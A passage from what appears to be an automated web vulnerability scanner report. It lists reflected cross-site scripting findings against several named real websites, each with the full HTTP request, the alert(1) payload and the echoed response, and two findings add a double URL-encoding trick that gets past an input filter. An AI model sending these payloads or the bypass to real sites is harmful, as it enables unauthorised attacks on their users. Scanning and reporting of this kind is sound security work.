Date: Thu, 11 Aug 2011 23:44:33 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "7190a<script>alert(1)</script>c544176858a":"1",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallery",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound
...[SNIP]...

1.215. http://content.bestbuyon.com/solr/select/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.bestbuyon.com
Path:   /solr/select/

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a1818<script>alert(1)</script>aed90a4ab72 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp1313106315813&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallerya1818<script>alert(1)</script>aed90a4ab72&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 756
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":1,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
   "fl":"title,type,ss_type,ss_feature_desc,sis_field
...[SNIP]...
ail,created",
   "sort":"sis_field_dotcom_slot asc,sis_field_yellow_tag_rating desc,created desc",
   "indent":"on",
   "start":"0",
   "q":"-tid:1487 AND tid:1630 AND ss_type:kaltura_entry2 OR ss_type:gallerya1818<script>alert(1)</script>aed90a4ab72",
   "callback":"jsonp1313106315813",
   "qt":"standard",
   "wt":"json",
   "rows":"3"}},
"response":{"numFound":0,"start":0,"docs":[]
}})

1.216. http://crm.rightnow.com/app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.rightnow.com
Path:   /app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15082%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6008e264d60 was submitted in the REST URL parameter 5. This input was echoed as 15082"><script>alert(1)</script>6008e264d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php15082%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6008e264d60 HTTP/1.1
Host: crm.rightnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss5ff99%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E6ad8c47ae16
Cookie: s_vi=[CS]v1|272F47EA8501068E-6000010AE03739B6[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%3B%20s_sq%3D%3B; cp_session=aUj5qWs6mX7AHzwuH9xZilzM5gW_aAO2i3CxmzaEYV2hmNoPxGVae6fY_vANUgSjssEzGCeCTwYfX0A3V_TmZx%7E_FmpBKFdSYBzswHbYrev9E1X5oeZG6fQvLwRI3Zbt1H2cP5aqp5r666b4VcHgIA9%7EIv3fCrCIh2H1itSXqchyPDcYYA_HotVzBmNra6wJ2RvC_FQ9UEgl_Wg2vwA3A1sD6pUObM65EV4%7EyxjIgXnHCFLcX3meK0lJPp4Oo6Rx6seOPLIaCBdDfWJYNiQVrRkTDa8SBwGGzEi50c_EPe1bWSsaCmBGl3I0Jw2JRpS%7ES3TBM1eJsoF7axf4I9IyzyDY%7E4Y_ISVIsUNkijHExCpV1f5g9qj3hjp%7ER0x%7EKyXI3iWkz3aINs4TEbgWtwToTCAVb8Zo0QnJ_A5FmY6KJDdsfh5U3FKQKGCB%7EixV730uEh6nbJSl80NyYcie%7EJZaD%7EZKG05DLEE%7EWBQgcmTC_LPdea9oYk3wt7s3iB80kS%7EAmTxduFNM9KQS00qJBjy8wkJU%7El7xQp8k3lfxWbVlShU%7EP1pWpwmDrpS24d32bEL3nqJYgd%7EKHaQ90pouW1LzynjALbEoPICCRf_Nbvw8XKNKVvHkYZITiK1C7dhp5dOAhhABQ3GjXBrzM%21

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 19:51:55 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUjgwWf50Q1xLfuQgo%7EgaQx%7Ez5TdpY0z2KnfDnOhdfMxduns09TzyLSWGBu3wj%7E0gnqlptSKvBji1YTqxLFlse1sSlsDqZVLtljYE%7EWqACVZDhEQ82TBw9C4UpmFbpIBv5PS%7EYrwXUu7SX9RwuhLcdZYtQWkdnkssANB31ymEHUMpbpE628vEKFeSXePGBBXR3eNUZT0lzIlWTgPpFqd%7EM2wDrR7UiXJi6z02RgU3wjxoMSdctgtqw7RY3Klsuaqf63uwNwf5MJYMZH2GdCzn_wAH0pNU4BBMjMHM5g_wv7Kh76kg6hpFsgMy6ockjOCZsdXuUsAHT%7EWri8V3aqP1Ik16ZgweUYlmHufVAQvh_k1gHlW%7EjbPgS77fRaGQ5bUiLkShVD2aUS_etIGWtaIgIR22V8xo_42GEVVm%7ExfgUp2%7EksOn2GpUH5FoR5JSxWz%7ELlOnM8uOgzZJQDgTvUbQsQFc8W7JQsImRHZDXRlQDh7tUD53%7EBEdBjx1Ba7KpBR25bEIiaNa27hxOhK8ZoM6k_kiRtAqAnC%7EAq6sm5MOUKM5o7I_aCpySd0t2iHc10lUHbFYiFY2OG6KewGJ9sa5Zfi0Q6tKb4JwIDsQKlxVsbbha%7EwXmzCPtOrAoclagzwX7uCEmtW2HK4eWAvnA9jduqVVQ8nhd%7Et2kvUzPLakN%7ExmgoFvZpWOgSnEIY%7EbKqnHG8e22c_IzMSMJZSnxUzr9NoiLq9jEmOZT2AugHyohrxjOgv1MPIsJK_yVeF8PpUqgoptKdp9EbAcTiv6G5ISZhSHcM%7E41VTKkkTw3yRr9fAKlj_49MbcQ4XMdM475TKR6paafRPcZtaabouIn5Pcc8DsSFXic%7EjqYZopA_MH8pngcSFCw5p8zbjmKVrHQ7LoVccJfL88pjb0S%7EXPv5Dr8cFEW01FqvW2Y3LUxVq8urS6KNQeimsha2oVhFbswb4NfKXmNJSij5fwvO3x6ru4kmLuhlbA58nhREVv1H2Kc8sypkDjxUuG56e%7E3obTNp1W521fWhn8ia2bmjpuRWfEuynLNwUIQV_GBFeL8C6BPJkCGjxFSL2kcr9Lre%7Eja02GNZCq5MP_HQNxIpVCuYnPUZIKzOK_Ty8%7E7ZmevqEPLKV0HXHK8EZxfsjp2%7EmDgoR4Pp2rIzGCqO_cUfkopA2xfpIBhRox0ZmWkUrqTyu8JH_z0ENM260PQgOF_6lsYSpAhZeTTiigz8q5AuMebp7B5hGpcN4tEc6x47HUnTD2CkRO96Z1NoeRYqA%21%21; path=/; httponly
RNT-Time: D=263512 t=1314820315605217
RNT-Machine: 20
Vary: Accept-Encoding
Content-Length: 37814
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="no_wrapper" xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:la
...[SNIP]...
<a id="rn_FloatboxRedirectLink_19" class="permalink" href="http://www.rightnow.com/sso-thanks.php15082"><script>alert(1)</script>6008e264d60?redirect=http%3A%2F%2Fcrm.rightnow.com%2Fapp%2Futils%2Fcreate_account">
...[SNIP]...

1.217. http://crm.rightnow.com/app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crm.rightnow.com
Path:   /app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc3c2ed414 was submitted in the REST URL parameter 5. This input was echoed as f2e2f"><script>alert(1)</script>1cc3c2ed414 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.phpf2e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc3c2ed414 HTTP/1.1
Host: crm.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/cx.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUsIbjDPvwtWKjEbeoDdDP2oIs%7EXKwlWDXSFfP1wLjJkymobcfQJ1FnQh4qCshV42J9jAzkTD6vwgoBjxOlHqoYdsnLJ5cqlIXurn1GfLOke0sTztst%7Ebumdh3femO3bcVtHxAIksT7ndD170pheWiKw0L6KYBS7rj

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:19 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUV_xO1D%7E6wdMUuFd97XofG3D%7EDDK0HGusTTVorlmY_74hHqt0aG7nDYW0_vVFiz59xWEdGqpvXKq3evbdTCn_QLL6qCgJ1c8hXFfKBlwjEA3zCTy5Vkg2FRQ_P5JqZCXYAuQepmsJW6lvcCXM5SFLrXj8HttwYCS4optkDe2iMjCARtlhWmm6J3pHmLiDTf855z7hZc%7E1HwkxzcvsEN3v83GcrQmAdCQQw4Gv3rXRq0LkmgUYEMwsCcz3LcdtGJ5fE%7EG12wVItLkuoUc1T792KP9202ZSi5JMLmPxN_BiQsOE2W22jMLYod7AE2WDhpsE16Z8Jz5dQA3mIvYIDtgl_q3nAlP4%7EwpJIkS14tlGlAkW6XXdJ909DAZlzcDxC6VBYwewkiCOo14Jo_m2jX0_xyZ4qc1nGGFs8Aergb1XO0kClNM4Y1s8g9ocUJpoFMVhFPfmP3V%7E%7E7J_ejfixb2vSRh6FpUGEb1Cs4CEUXUqHzgmD_Pi3xhk94EkcsSX8NBahluyNucjfK7H0ed7RhZ65FYn_SrlDy75W5awygsdV6LpP7rHjK2CDYdRDpUtS92D7qnc6A5a4JPRAg0RbQM9t7PWo1AAbwfnvphk8GPhcQWZcv_B0RqGb3gG578hipUIC1RrLJed6NRgLk_DD%7E7%7EQvdhbEuxbxMiXsAEEJQFwna%7ExAfflSEgZVJ0R36Lb8VekvWXLnzPgB1qD1j%7E%7EXdjasQee5U_qKIXOImWpfk0PrfFQzjleyurWMETNPe919pbj2r4q4gI4Os%21; path=/; httponly
RNT-Time: D=232930 t=1314814579813696
RNT-Machine: 20
Vary: Accept-Encoding
Content-Length: 8164
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="no_wrapper" xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:la
...[SNIP]...
<a id="rn_FloatboxRedirectLink_2" class="permalink" href="http://www.rightnow.com/sso-thanks.phpf2e2f"><script>alert(1)</script>1cc3c2ed414?redirect=http%3A%2F%2Fcrm.rightnow.com%2Fapp%2Futils%2Faccount_assistance">
...[SNIP]...

1.218. http://drh.img.digitalriver.com/DRHM/store [Action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3c09'%3balert(1)//4faa26409b6 was submitted in the Action parameter. This input was echoed as f3c09';alert(1)//4faa26409b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DRHM/store?Action=DisplayPagef3c09'%3balert(1)//4faa26409b6&SiteID=adbevlus&Locale=en_US&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet44839%27%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css
Cookie: op_refUrl=http%3A//www.fakereferrerdominator.com/referrerpathname%3Frefparname%3Drefvalue; op_browser=mozilla_1.9.2.13; op_os=windows; op_browserHigh=mozilla; RefURL=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; fcOOS=fcOptOutChip=undefined; fcC=X=C801321249&Y=1314797131799&FV=-1&H=1314797131698&Z=0&E=2283193&F=0; fcP=C=0&T=1314797131799&DTO=1314797131698&U=801321249&V=1314797131698; fcR=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue; fcPT=http%3A//drh.img.digitalriver.com/store%3FAction%3DDisplayContentManagerStyleSheet44839%2527%253balert%281%29//c075691c24c%26SiteID%3Dadbevlus%26StyleID%3D35830700%26StyleVersion%3D17%26styleIncludeFile%3Dstyle.css; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:25:22 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=96516770448,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app71
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:25:22 GMT
Date: Wed, 31 Aug 2011 13:25:22 GMT
Content-Length: 39610
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script type="text/javascript"
...[SNIP]...
Type'],
attributes: ['platform']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayPagef3c09';alert(1)//4faa26409b6',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=adbevlus&Locale=en_US&nextAction=DisplayPagef3c09';alert(1)//4faa26409b6&StyleID=35830700&Style
...[SNIP]...

1.219. http://drh.img.digitalriver.com/store [Action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44839'%3balert(1)//c075691c24c was submitted in the Action parameter. This input was echoed as 44839';alert(1)//c075691c24c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayContentManagerStyleSheet44839'%3balert(1)//c075691c24c&SiteID=adbevlus&StyleID=35830700&StyleVersion=17&styleIncludeFile=style.css HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://volumelicensing.adobe.com/store/adbevlus/en_US/pd/ProductID.230278700?af0f8--%3E%3Cscript%3Ealert(document.location)%3C/script%3Ebb99325cab5=1

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Wed, 31 Aug 2011 13:16:04 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=23501754707,0)
Content-Length: 39650
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app77
Cache-Control: max-age=86400
Expires: Thu, 01 Sep 2011 13:16:04 GMT
Date: Wed, 31 Aug 2011 13:16:04 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script type="text/javascript"
...[SNIP]...
tes: ['platform']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayContentManagerStyleSheet44839';alert(1)//c075691c24c',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=adbevlus&Locale=en_US&nextAction=DisplayContentManagerStyleSheet44839';alert(1)//c075691c24c&St
...[SNIP]...

1.220. http://ebay.adnxs.com/ttj [pt1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad198'-alert(1)-'f60f448d4b0 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=553109&cb=6612185646&pt1=0000805764ad198'-alert(1)-'f60f448d4b0&pt2=0001017406&pt3=1183&imp_id=v2:I:1313102118:6612185646:0000805764:0001017406:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000805764/mnum=0001017406/cstr=2758506=_4e445926,6612185646,805764^1017406^1183^0,1_/xsxdata=$XSXDATA/bnum=2758506/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImKQDEAoYAiACKAIwv_v88QQQv_v88QQYAQ..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W^#Wxroe5'Qr*isq44:$W)PwtCL3Wkk.A$=koM-QuhP/]Koq9!Np4.bwxgRWIv/%+A:(Sm-lS>S/<%G(qFQ657r2SJx@>1BJcXdvLbw%eg@.oeBE[0W*!?=d3UhDo(M5j%8QLDVbUf/cTK7Tu/h$*'[v-OIQ?^J[pX.=us9OGX%wo_^V(; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYAiACKAIw_bKR8gQQ_bKR8gQYAQ..; path=/; expires=Wed, 09-Nov-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRorYewj6(wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*8`-TqPif; path=/; expires=Wed, 09-Nov-2011 22:36:45 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 11 Aug 2011 22:36:45 GMT
Content-Length: 1239

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/77160/4?mpt=1313102205}&Perf_Tracker_1=0000805764ad198'-alert(1)-'f60f448d4b0&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183&ext_id=5475285200138681784&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344452&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAE
...[SNIP]...

1.221. http://ebay.adnxs.com/ttj [pt2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52654'-alert(1)-'99b1aa3f16d was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=553109&cb=6612185646&pt1=0000805764&pt2=000101740652654'-alert(1)-'99b1aa3f16d&pt3=1183&imp_id=v2:I:1313102118:6612185646:0000805764:0001017406:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000805764/mnum=0001017406/cstr=2758506=_4e445926,6612185646,805764^1017406^1183^0,1_/xsxdata=$XSXDATA/bnum=2758506/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImKQDEAoYAiACKAIwv_v88QQQv_v88QQYAQ..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W^#Wxroe5'Qr*isq44:$W)PwtCL3Wkk.A$=koM-QuhP/]Koq9!Np4.bwxgRWIv/%+A:(Sm-lS>S/<%G(qFQ657r2SJx@>1BJcXdvLbw%eg@.oeBE[0W*!?=d3UhDo(M5j%8QLDVbUf/cTK7Tu/h$*'[v-OIQ?^J[pX.=us9OGX%wo_^V(; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYAiACKAIwjbOR8gQQjbOR8gQYAQ..; path=/; expires=Wed, 09-Nov-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRp%^ex]h1wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*B@yUR1!h; path=/; expires=Wed, 09-Nov-2011 22:37:01 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 11 Aug 2011 22:37:01 GMT
Content-Length: 1239

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/77160/4?mpt=1313102221}&Perf_Tracker_1=0000805764&Perf_Tracker_2=000101740652654'-alert(1)-'99b1aa3f16d&Perf_Tracker_3=1183&ext_id=2608476615395181280&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=300x250&adid=344452&mpvc=http://ib.adnxs.com/click%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAA
...[SNIP]...

1.222. http://ebay.adnxs.com/ttj [pt3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b254c'-alert(1)-'3820416d3a8 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

